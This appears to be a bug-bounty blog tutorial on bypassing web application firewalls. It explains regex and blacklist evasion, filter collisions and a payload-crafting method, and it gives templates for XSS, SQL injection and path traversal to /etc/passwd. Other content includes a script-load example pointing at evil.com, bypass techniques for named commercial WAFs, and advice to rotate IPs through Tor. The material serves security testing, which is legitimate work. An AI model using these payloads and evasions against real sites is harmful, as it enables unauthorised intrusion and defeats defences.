Web application firewall bypass

October 11, 2022

A web application firewall (WAF) is a program designed to filter, monitor and block malicious web requests according to its configuration.

A WAF's filtering and detection rely on two primary configurations: black/white lists and regular expressions (regex). These configurations allow a WAF to determine whether a request contains malicious content.

In this article, we will discuss different ways a WAF can be bypassed once a vulnerability has been discovered.
The focus is on how to take advantage of the WAF's configuration and of any normalisation that affects how a payload is handled in transit. We will show different scenarios and examples of manipulations that lead to a successful bypass.

Regex and list tampering

Regex stands for regular expression: a sequence of characters that describes a pattern to search for in a given piece of content. In simple terms, a regex can be used to detect patterns in a source, which is a huge advantage when developing filter mechanisms for web application firewalls.

Here is an example of how a regex could be used to find all words starting with an uppercase “Y”.

Regex

Y[a-zA-Z]+

String

Yes It's possible to hack on YesWeHack. You just need to sign up!
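
The same match can be reproduced in a few lines of Python. This is only a sketch using the standard `re` module; the variable names are ours.

```python
import re

# Pattern and sample string taken from the example above.
pattern = re.compile(r"Y[a-zA-Z]+")
text = "Yes It's possible to hack on YesWeHack. You just need to sign up!"

# findall returns every non-overlapping match, scanning left to right.
matches = pattern.findall(text)
print(matches)
```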

If you want to dig deeper and practice custom regex, you can do so here.

Let’s set up a simple filter that is intended to protect against event handler attributes such as onload, which are used mainly in HTML and JavaScript.

Regex

<.*on.*=.*>

Payloads

Did you notice anything?

The last payload looks almost identical to the first but it’s not detected by the regex. Why?
This is because the regex only matches a pattern that ends with a >. Imagine how precise a regex has to be to detect every variation of a pattern.

This is one of many examples of how web application firewalls are bypassed.
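
To make the effect of the trailing > concrete, here is a minimal sketch in Python. The two payloads are our own illustrative assumptions (a closed and an unclosed tag), not the exact ones from the original test, and `is_detected` is a hypothetical helper that stands in for the WAF rule.

```python
import re

# The filter from above: a tag that contains "on...=" and ends with ">".
waf_rule = re.compile(r"<.*on.*=.*>")

# Assumed payloads for illustration: identical except for the closing ">".
closed_tag = "<img src=1 onerror=alert(1)>"
open_tag = "<img src=1 onerror=alert(1)"

def is_detected(payload: str) -> bool:
    """Return True if the stand-in WAF rule matches anywhere in the payload."""
    return waf_rule.search(payload) is not None

print(is_detected(closed_tag))  # the rule finds its closing ">"
print(is_detected(open_tag))    # no ">" anywhere, so the rule cannot match
```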

So, what happens if we just remove the > at the end of the regex and keep the anything .*?

Regex

<.*on.*=.*

Payloads

<img src=1%0aonerror=alert(1)

This is bypassable because we take advantage of two properties of the regex. First, it looks for a payload that starts with <; second, it looks for any on* event handler followed by an equal sign =.
The payload above takes advantage of the < symbol that the regex searches for as a prefix. The payload is split into two pieces with the help of a newline \n (URL-encoded as %0a).

The first payload piece starts with the < symbol and triggers the regex to start its pattern search. Then, when we add the newline to the payload, the match breaks, because by default .* matches any character except a newline. The rest of the payload therefore goes undetected.

Lastly, we add the final piece of the payload, which includes the onerror=alert(1) part. The regex won’t detect the onerror handler because that line does not start with the < symbol needed to trigger the regex. The result is a successful bypass.
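
The newline split can be checked with a short Python sketch. We assume here that the WAF URL-decodes the request before matching and that its regex engine, like Python's `re`, does not let `.` match a newline by default. The `re.DOTALL` variant is only our illustration of why the dot is the weak point, not a fix taken from any real WAF.

```python
import re
from urllib.parse import unquote

waf_rule = re.compile(r"<.*on.*=.*")

raw = "<img src=1%0aonerror=alert(1)"
decoded = unquote(raw)  # "%0a" becomes a real newline character

# Default mode: ".*" stops at the newline, so "on...=" is never reached.
detected_default = waf_rule.search(decoded) is not None

# With DOTALL, "." also matches newlines and the same payload is caught.
detected_dotall = re.search(r"<.*on.*=.*", decoded, re.DOTALL) is not None

# Control: the same payload on a single line is detected.
detected_single_line = waf_rule.search("<img src=1 onerror=alert(1)") is not None

print(detected_default, detected_dotall, detected_single_line)
```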

A WAF also uses different word lists to detect payloads by searching for words inside the request. If it detects a word within the given blacklist in the request, the request will be blocked by the WAF. The opposite type of list is the whitelist. This word list contains words which are allowed to be used or that are strictly needed within an input.
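
As a rough sketch of how such lists behave, consider the following Python snippet. Both lists are assumptions made for illustration: the blacklist holds two sample words, and the whitelist models a hypothetical parameter that only accepts two sort directions.

```python
# Assumed sample lists; a real WAF ships far larger and more nuanced ones.
BLACKLIST = {"alert", "script"}
WHITELIST = {"asc", "desc"}  # hypothetical: the only values a "sort" parameter may take

def hits_blacklist(value: str) -> bool:
    """Block when any blacklisted word appears anywhere in the value."""
    return any(word in value for word in BLACKLIST)

def passes_whitelist(value: str) -> bool:
    """Allow only values that are explicitly listed."""
    return value in WHITELIST

print(hits_blacklist("<script>"))    # contains "script"
print(hits_blacklist("<svg>"))       # no blacklisted word
print(passes_whitelist("asc"))       # explicitly allowed
print(passes_whitelist("asc;--"))    # anything else is rejected
```

A blacklist fails open (anything not listed passes), while a whitelist fails closed, which is why blacklists are the usual target when crafting a bypass.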

Let’s upgrade the regex filter so that it accounts for the previous bypass methods and fixes the bypasses related to newlines.

Regex

.*on(.*|\n)=(.*|\n)

The (.*|\n) simply means “anything or a newline”.

Blacklist

alert
confirm
prompt
iframe
script
style
base

Payloads

The regex didn’t detect <imgsrc=1 but detected the onerror=alert(1) part in the second-to-last payload. This results in a WAF block, but in a real-world scenario you would only have received a forbidden/block page, unaware that half of your payload was successful.

That is why it’s very important to take one step at a time when crafting a payload (more on that later).

So how did the last payload bypass the regex?

This is because we have configured the regex to detect anything OR a newline, on(.*|\n)=, and not both of them combined.

Valid

on
=.*

or

on.*=

Invalid

on
NotAnEqualSignAfter=

I think you get the point. It is very difficult to configure a firewall to detect every kind of pattern. Because payloads are so flexible, they tend to stay one step ahead of the filter.
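
The valid and invalid cases above can be verified with a small Python sketch. We write the rule with (.*|\n) in both groups, as described in the explanation, and reuse the article's own sample strings; `rule_matches` is a hypothetical helper name.

```python
import re

# Upgraded rule: after "on", either a run of non-newline characters
# or exactly one newline may appear before "=", but not a mix of both.
rule = re.compile(r".*on(.*|\n)=(.*|\n)")

def rule_matches(payload: str) -> bool:
    return rule.search(payload) is not None

newline_then_equals = "on\n=x"                # matched through the "\n" branch
same_line = "onerror=x"                       # matched through the ".*" branch
mixed = "on\nNotAnEqualSignAfter="            # newline AND text: neither branch fits

for sample in (newline_then_equals, same_line, mixed):
    print(repr(sample), rule_matches(sample))
```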

Firewall and frontend/backend filter

It’s important not to mix up firewall filters with frontend and backend filters. You might be able to bypass the firewall, but that doesn’t mean you have actually found a vulnerability in the system itself. Remember that the firewall’s purpose is to provide an extra layer of protection and detection against malicious requests.
If the frontend and/or backend does not filter or escape input properly, that is likely a vulnerability. A gap in the web application firewall’s filters is not, since the firewall does not protect an actual input handler.

A good example would be the following:

Firewall filter

<.*on=.*=.*

Payload

<img src='1' onerror='alert(1)'>

Scenario 1. Payload blocked: the request is blocked
Scenario 2. Payload bypassed: the WAF forwards the request to the backend code

Output

<p>no result for: <b><img src='1' onerror='alert(1)'></b></p>

Status: Web application firewall bypassed and vulnerability exploited, resulting in cross-site scripting (XSS).

In this case, the firewall was bypassed and the backend was vulnerable to XSS injection because it didn’t escape dangerous characters in the user input.

If the backend were to escape the search GET parameter ($input variable), the result would be that the WAF was bypassed but the input itself was not vulnerable to XSS.

Example

Backend programming language PHP – htmlspecialchars()

Output:

<p>No result for: <b>&lt;img src=&#039;1&#039; onerror=&#039;alert(1)&#039;&gt;</b></p>

Status: Web application firewall bypassed but search parameter wasn't vulnerable.
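
The difference between the two outcomes can be sketched in Python, using `html.escape` as a stand-in for PHP's htmlspecialchars(). This is an assumption for illustration, not the article's backend code: the template and function names are ours, and Python encodes a single quote as `&#x27;` where the PHP output above shows `&#039;`.

```python
from html import escape

TEMPLATE = "<p>No result for: <b>{}</b></p>"

def render_unescaped(user_input: str) -> str:
    """Vulnerable: reflects the input as-is."""
    return TEMPLATE.format(user_input)

def render_escaped(user_input: str) -> str:
    """Safe: encodes <, >, &, and both quote characters before reflecting."""
    return TEMPLATE.format(escape(user_input, quote=True))

payload = "<img src='1' onerror='alert(1)'>"
print(render_unescaped(payload))
print(render_escaped(payload))
```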

When trying to bypass a WAF, it is very important to first determine how the frontend/backend filter works before attempting to exploit it. If the entry point is not vulnerable, what is the point of bypassing the firewall?

Normalisation and filter collision

In many cases, the frontend, the backend and/or technologies such as proxies cause not only normalisation but also filter collisions. A filter collision occurs when two or more filters perform a similar task on the same input.

Example of a simple collision

Imagine that we use the following payload: ywh"

  1. The browser URL-encodes the " character and then sends it to the web application firewall.
Payload → ywh%22
  2. The WAF sees no suspicious content and the payload continues to the frontend.
  3. The JavaScript that runs on the frontend decodes the payload and escapes the quote with a backslash.
Payload → ywh\"
  4. The backend deletes all quotes in the input to avoid quotes altogether. (Collides with the frontend filter)
Payload → ywh\
  5. When the payload is reflected in the frontend response, it appears as ywh\

The end result: you are now able to take advantage of this collision for a lot of different payloads. Since the quotes are deleted and the \ is left alone, you could use it to bypass URL verification, or to escape the backslash itself with \\" which results in \\ .

Take advantage of all the different behaviours of the target when bypassing the web application firewall.

Example custom payloads related to the collision

SSRF → http:""localhost
XSS (that includes links etc) → src='""://evil.com/xss.js'
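
The collision can be simulated end to end with a few lines of Python. Every function below is a hypothetical stand-in for one hop in the chain described above (browser, frontend JavaScript, backend); a real target will differ in its details.

```python
from urllib.parse import quote, unquote

def browser(payload: str) -> str:
    """The browser URL-encodes special characters before sending."""
    return quote(payload, safe="")

def frontend(payload: str) -> str:
    """Frontend filter: decode, then escape every quote with a backslash."""
    return unquote(payload).replace('"', '\\"')

def backend(payload: str) -> str:
    """Backend filter: delete all quotes (collides with the frontend filter)."""
    return payload.replace('"', "")

def pipeline(payload: str) -> str:
    return backend(frontend(browser(payload)))

print(pipeline('ywh"'))                      # the quote is gone, the backslash stays
print(pipeline('http:""localhost'))          # quotes turn into two backslashes
print(pipeline("src='\"\"://evil.com/xss.js'"))
```

Neither filter is wrong on its own; it is the combination that turns a harmless quote into a backslash the attacker controls.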

Payload preparation

The main challenge when building a payload that bypasses the WAF is to determine how the web application firewall interprets it. Since a WAF only responds with a forbidden page or lets the payload pass, we need to take small steps forward to build up a payload.

The payload should contain only the characters that are necessary for the type of vulnerability you are trying to exploit. This gives a better understanding of how the payload is handled and how it changes along the way.
There are lots of different ways to customise a payload, and depending on the vulnerability, different characters are particularly important for a successful payload.

Examples (not limited to):

  • SQL injections: ', ", \, (, )
  • Cross-site Scripting: ', ", `, \, <, >
  • Template Injection: $, #, %, {, }
  • PHP code injection: ?, <, >, ;
  • Local file include: ., /, \, :

There is no need to use onload if the firewall does not protect against the HTML tag <script>, and there is no need to use the symbols < or > if we inject inside an HTML tag.
The same goes for SQL injection, template injection and other types of vulnerabilities that need a payload to be exploited properly. Create and adapt a payload based on the location where it is placed.

There are some good payloads out there, but if you want to be able to bypass WAFs at an advanced level, most of these payloads are not the solution. However, taking notes from them and storing template payloads are good strategies.

Consider a simple payload as follows:

<script>

The payload itself does not exploit anything. The first step is actually to get blocked. It may sound strange, but it’s the first step in creating a payload that can bypass the WAF. The only situation where this technique can be bad is if the firewall blocks you permanently. In these cases, you can use proxies that allow you to change IP addresses frequently. Tor can be useful in these situations.

Most WAFs block this payload directly because it contains the HTML tag <script>, which is often used in XSS payloads. Had this been a SQL injection, the payload ' or 1=1 -- - would have been a good choice, since it is obvious that it will be blocked.

So why do we want a blocked payload?

Because it’s not possible to adapt a payload to bypass a WAF without knowing how the WAF sees the input. Common payloads are a good starting point because they give direct feedback from the firewall, which makes reconnaissance of the firewall configuration easier. Most of the time, the firewall will react even more strictly because such payloads trigger several filters at once.

Payload: <script>
<, >   -> are probably within the regex pattern
script -> Is probably inside the blacklist

To continue the process, we now start adjusting the payload until we have the information we need. Each time the payload is blocked or accepted, you get more feedback on how to adjust it to bypass the WAF.
If the firewall only blocks the request but not the host it came from, it’s possible to automate some parts.

Examples of steps that could be automated:

  • Fuzzing for HTML tags and chars
  • Encoding mechanism that can work to bypass the firewall
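
A rough sketch of such automation is shown below. To keep it self-contained, `waf_blocks` is a local stand-in built from the regex and blacklist used earlier in this article; against a real target it would send a request and check for the block page. The stand-in does not decode its input, which is an assumption, and an encoded payload only matters if something behind the WAF decodes it again.

```python
import base64
import re
from urllib.parse import quote

BLACKLIST = ["alert", "confirm", "prompt", "iframe", "script", "style", "base"]
RULE = re.compile(r"<.*on.*=.*")

def waf_blocks(payload: str) -> bool:
    """Stand-in WAF: block on a regex hit or on any blacklisted word."""
    return RULE.search(payload) is not None or any(w in payload for w in BLACKLIST)

def fuzz(candidates) -> dict:
    """Map every candidate to True (blocked) or False (passed)."""
    return {c: waf_blocks(c) for c in candidates}

def encodings(payload: str) -> dict:
    """A few encodings of the same payload to try against the filter."""
    return {
        "url": quote(payload, safe=""),
        "base64": base64.b64encode(payload.encode()).decode(),
    }

tag_results = fuzz(["<script>", "<svg>", "<iframe>", "<base>", "<img onx=1"])
encoding_results = fuzz(encodings("<script>").values())

print(tag_results)
print(encoding_results)
```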

Example of a WAF reconnaissance process

Using the steps in the <script> payload, we now have an understanding of how the WAF filters its input data. We successfully managed to collect working tampers that we can use to build a fully functional payload that will bypass the firewall.

Payload templates

These are core templates and there are lots of different types that you can use and create yourself. Always use the characters and combinations that give the best feedback from the web application firewall.

Cross-Site scripting

<script>
<svg>
<iframe>
<base>
<img onx=1

//Can later be tested with:

'0"><x
<1337onx=1>
</x>
"<x>"
<x"0'x

SQL injection

' or 1=1 -- x
\'or+1=''
' x 1=1
sleep(4)
'||1
' select x

//Can later be tested with:

or/**/and/**/
' x=1
x')or('x

Local file inclusion

/etc/passwd
file://etc/passwd
xyz://etc/passwd
etc///passwd
\..\..\x
..;/..;/
x../../x
../

//Can later be tested with:
\/..\/\/..\/x
../..
1337../
../..x.png
./././
.:./.:./
.%00./x.php

Methodology

The methodology covers the steps to follow once a vulnerability has been detected but the web application firewall blocks the payload and prevents it from successfully exploiting the vulnerability.

Input Recon

Analyse the types of chars that can be used in the payload.

Normalisation


Detect whether any normalisation occurs, related to the technology used by the target, that may affect the transport of the payload and/or modify its content.

Frontend/Backend filter


Determine how the frontend and/or backend filters adjust the payload and then use that against the web application firewall (Delete, Replace, Append, Add chars etc…).

Collisions


Look for collisions between frontend and backend filters (if any). This is rare, but in some vulnerabilities it is possible to take advantage of the vulnerable input behavior to bypass the web application firewall as well.

Regex


With each attempt, add a new piece to your payload to map out the firewall's regex.

Black and white lists


Once the basics of the WAF regex are known, add strings that may be on the white/black list to the payload to analyse where they can and cannot be used.

Payload preparation


Analyse the results of the different payloads used. Use this technique to adjust and update the next payload that will be used.

Firewall weaknesses

This section is based on techniques that have repeatedly managed to bypass the same web application firewall at different companies.

CloudFlare

  • Newlines that split the payload
  • Overload of parentheses (sleep((3)))
  • Payloads that do not include spaces 'or-'1
  • Weak blacklist
  • Base64 encode

Akamai

  • Newlines that split the payload
  • Math to set or compare values (2-10/2)
  • Multi-line comment with backslashes manipulation /*\/*\/*/
  • Double URL encoding %2522
  • Base64 encode
  • Early discovered > or &gt; <img/&gt;/onload=...
  • Space before parentheses/backticks payload(1), payload `1`
  • Payloads that do not include spaces 'or-'1
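
A few of the tampers listed for CloudFlare and Akamai above are plain string transforms and can be sketched in Python. The function names are hypothetical helpers of ours, and whether a given transform still yields a working payload depends entirely on the target.

```python
from urllib.parse import quote

def split_with_newline(payload: str) -> str:
    """Replace the last space with a URL-encoded newline to split the payload."""
    head, sep, tail = payload.rpartition(" ")
    return f"{head}%0a{tail}" if sep else payload

def overload_parentheses(payload: str) -> str:
    """Double every parenthesis, e.g. sleep(3) becomes sleep((3))."""
    return payload.replace("(", "((").replace(")", "))")

def double_url_encode(payload: str) -> str:
    """URL-encode twice, so that one decoding pass still leaves an encoded value."""
    return quote(quote(payload, safe=""), safe="")

print(split_with_newline("<img src=1 onerror=alert(1)"))
print(overload_parentheses("sleep(3)"))
print(double_url_encode('"'))
```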

Airlock

When payloads are presented inside quotes. "alert(1)"

START HUNTING!🎯